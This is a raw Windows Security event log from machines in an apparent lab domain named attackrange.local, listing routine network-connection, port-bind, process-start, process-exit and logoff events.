Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887182
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4
Application Name: System
Network Information:
Direction: Inbound
Source Address: 10.0.1.14
Source Port: 137
Destination Address: 10.0.1.255
Destination Port: 137
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887181
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4
Application Name: System
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 137
Destination Address: 10.0.1.255
Destination Port: 137
Protocol: 17
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=887180
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x18c8
New Process Name: C:\Windows\System32\taskhostw.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x518
Creator Process Name: C:\Windows\System32\svchost.exe
Process Command Line: taskhostw.exe
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887179
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Inbound
Source Address: 127.0.0.1
Source Port: 49637
Destination Address: 127.0.0.1
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887178
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 127.0.0.1
Source Port: 49637
Destination Address: 127.0.0.1
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 65789
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=887177
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x1b0c
Process Name: C:\Windows\System32\csrss.exe
Exit Status: 0x0
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887176
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Inbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 63912
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 49669
Protocol: 6
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887175
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 55376
Destination Address: 10.0.0.2
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887174
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Inbound
Source Address: ::1
Source Port: 49637
Destination Address: ::1
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887173
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: ::1
Source Port: 49637
Destination Address: ::1
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887172
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 49637
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887171
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 49637
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887170
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 169.254.79.158
Source Port: 50512
Destination Address: 224.0.0.252
Destination Port: 5355
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887169
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 169.254.79.158
Source Port: 50512
Destination Address: 224.0.0.252
Destination Port: 5355
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887168
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 169.254.79.158
Source Port: 50512
Destination Address: 224.0.0.252
Destination Port: 5355
Protocol: 17
Filter Information:
Filter Run-Time ID: 69910
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887167
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: fe80::d02d:b038:b054:4f9e
Source Port: 50512
Destination Address: ff02::1:3
Destination Port: 5355
Protocol: 17
Filter Information:
Filter Run-Time ID: 69912
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887166
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 50512
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887165
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 50512
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887164
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 169.254.79.158
Source Port: 58196
Destination Address: 224.0.0.252
Destination Port: 5355
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887163
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 169.254.79.158
Source Port: 58196
Destination Address: 224.0.0.252
Destination Port: 5355
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887162
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 169.254.79.158
Source Port: 58196
Destination Address: 224.0.0.252
Destination Port: 5355
Protocol: 17
Filter Information:
Filter Run-Time ID: 69910
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887161
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: fe80::d02d:b038:b054:4f9e
Source Port: 58196
Destination Address: ff02::1:3
Destination Port: 5355
Protocol: 17
Filter Information:
Filter Run-Time ID: 69912
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887160
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 58196
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887159
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 58196
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887158
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 169.254.79.158
Source Port: 137
Destination Address: 169.254.255.255
Destination Port: 137
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887157
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4
Application Name: System
Network Information:
Direction: Inbound
Source Address: 169.254.79.158
Source Port: 137
Destination Address: 169.254.255.255
Destination Port: 137
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887156
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4
Application Name: System
Network Information:
Direction: Outbound
Source Address: 169.254.79.158
Source Port: 137
Destination Address: 169.254.255.255
Destination Port: 137
Protocol: 17
Filter Information:
Filter Run-Time ID: 69910
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887155
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 53913
Destination Address: 10.0.0.2
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887154
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Inbound
Source Address: ::1
Source Port: 58083
Destination Address: ::1
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887153
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: ::1
Source Port: 58083
Destination Address: ::1
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887152
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 58083
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887151
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 58083
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278815
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4
Application Name: System
Network Information:
Direction: Inbound
Source Address: 10.0.1.15
Source Port: 138
Destination Address: 10.0.1.255
Destination Port: 138
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278814
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4
Application Name: System
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 138
Destination Address: 10.0.1.255
Destination Port: 138
Protocol: 17
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278813
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 3840
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53910
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=887150
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: ATTACKRANGE\Administrator
Account Name: administrator
Account Domain: ATTACKRANGE
Logon ID: 0x1B9F2C
Process Information:
Process ID: 0x1868
Process Name: C:\Windows\System32\AtBroker.exe
Exit Status: 0x1
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=887149
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x1648
Process Name: C:\Windows\System32\winlogon.exe
Exit Status: 0x0
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=887148
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: Window Manager\DWM-3
Account Name: DWM-3
Account Domain: Window Manager
Logon ID: 0x8D33D1
Logon Type: 2
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=887147
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: Window Manager\DWM-3
Account Name: DWM-3
Account Domain: Window Manager
Logon ID: 0x8D340A
Logon Type: 2
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=887146
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: Window Manager\DWM-3
Account Name: DWM-3
Account Domain: Window Manager
Logon ID: 0x8D340A
Process Information:
Process ID: 0x1bb4
Process Name: C:\Windows\System32\dwm.exe
Exit Status: 0xD00002FE
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=887145
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: ATTACKRANGE\Administrator
Account Name: administrator
Account Domain: ATTACKRANGE
Logon ID: 0x1B9F2C
Process Information:
New Process ID: 0x1868
New Process Name: C:\Windows\System32\AtBroker.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\High Mandatory Level
Creator Process ID: 0xba4
Creator Process Name: C:\Windows\System32\winlogon.exe
Process Command Line: atbroker.exe
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=887144
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x13fc
Process Name: C:\Windows\System32\LogonUI.exe
Exit Status: 0x0
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887143
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1304
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1264
Destination Address: 40.70.224.147
Destination Port: 443
Protocol: 6
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887142
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1304
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1264
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887141
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 54637
Destination Address: 10.0.0.2
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887140
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Inbound
Source Address: ::1
Source Port: 52857
Destination Address: ::1
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887139
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: ::1
Source Port: 52857
Destination Address: ::1
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887138
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 52857
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
